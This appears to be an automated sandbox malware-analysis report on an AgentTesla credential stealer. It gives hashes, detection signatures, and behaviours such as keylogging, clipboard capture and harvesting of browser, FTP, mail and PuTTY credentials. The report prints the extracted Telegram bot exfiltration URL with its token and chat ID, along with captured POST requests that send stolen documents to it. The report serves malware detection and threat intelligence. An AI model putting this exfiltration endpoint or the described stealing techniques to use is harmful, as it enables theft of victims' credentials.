Windows Analysis Report
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe

Overview

General Information

Sample name: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
Analysis ID: 1443568
MD5: 1022eee3d28a81920664b590983aafaa
SHA1: 002c1889f8e8ebbf781e3a1edb0985068b2a5b96
SHA256: ccd022fa7f9a0ee0928a7736faed2f9d9123234d209c7fdf9b436776669c4644
Tags: exe
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendMessage?chat_id=1165128482"}
Source | Rule | Description | Author | Strings
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x355a2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x35614:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3569e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x35730:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3579a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3580c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x358a2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x35932:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000000.1661358396.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x355a2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x35614:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3569e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x35730:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3579a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3580c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x358a2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x35932:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                          No Sigma rule has matched
                          Timestamp: 05/18/24-01:35:57.911306
                          SID: 2851779
                          Source Port: 49730
                          Destination Port: 443
                          Protocol: TCP
                          Classtype: A Network Trojan was detected

                          AV Detection

                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeAvira: detected
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendMessage?chat_id=1165128482"}
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.6768.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendMessage"}
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeJoe Sandbox ML: detected
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49746 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49750 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Networking

                          Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49730 -> 149.154.167.220:443
                          Source: unknownDNS query: name: api.telegram.org
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc76a891c5b1d3Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc76a893006882Host: api.telegram.orgContent-Length: 3951Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc8907cde902bbHost: api.telegram.orgContent-Length: 66993Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9221f98904f2Host: api.telegram.orgContent-Length: 66995Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc97bb00ca1497Host: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9b180ffd53ffHost: api.telegram.orgContent-Length: 66995Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc9f5b252489fbHost: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dca59a756be172Host: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcaa4c722ca350Host: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcad575d0aaf1fHost: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb1fe0d5217c4Host: api.telegram.orgContent-Length: 66995Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcb801a5c9ddf4Host: api.telegram.orgContent-Length: 67000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcbf5819b9d90cHost: api.telegram.orgContent-Length: 67000Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc29e30c1ac2fHost: api.telegram.orgContent-Length: 71967Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc6683c0d1efdHost: api.telegram.orgContent-Length: 67000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcc834c9eb4802Host: api.telegram.orgContent-Length: 67000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dccd9f9e07d58aHost: api.telegram.orgContent-Length: 67000Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc76a92388cec9Host: api.telegram.orgContent-Length: 67000Expect: 100-continueConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: unknownHTTP traffic detected: POST /bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc76a891c5b1d3Host: api.telegram.orgContent-Length: 915Expect: 100-continueConnection: Keep-Alive
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003351000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeString found in binary or memory: https://account.dyn.com/
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeString found in binary or memory: https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003574000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003633000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003693000.00000004.00000800.00020000.00000000.sdmp, 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4108158269.0000000003439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6937426667:AAH5h4aXvUjmlMFV8im9A9lKn7JS7MyNHLA/sendDocument

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, cPKWk.cs.Net Code: h5ESqJ
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                          System Summary

                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeProcess Stats: CPU usage > 49%
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4106900686.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000000.1661435807.0000000001020000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename93206442-328e-4793-9eb2-22117442bc41.exe4 vs 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 00000000.00000002.4106713875.00000000011B8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeBinary or memory string: OriginalFilename93206442-328e-4793-9eb2-22117442bc41.exe4 vs 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 0.0.1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe.fe0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exe, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeBinary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.H%o
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeMutant created: NULL
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\1c47eba374d49cd0a1a90cbd1668854b0fff5dc9b774db190acfc6d15f753dec_dump.exeSection loaded: userenv.dllJump to behavior
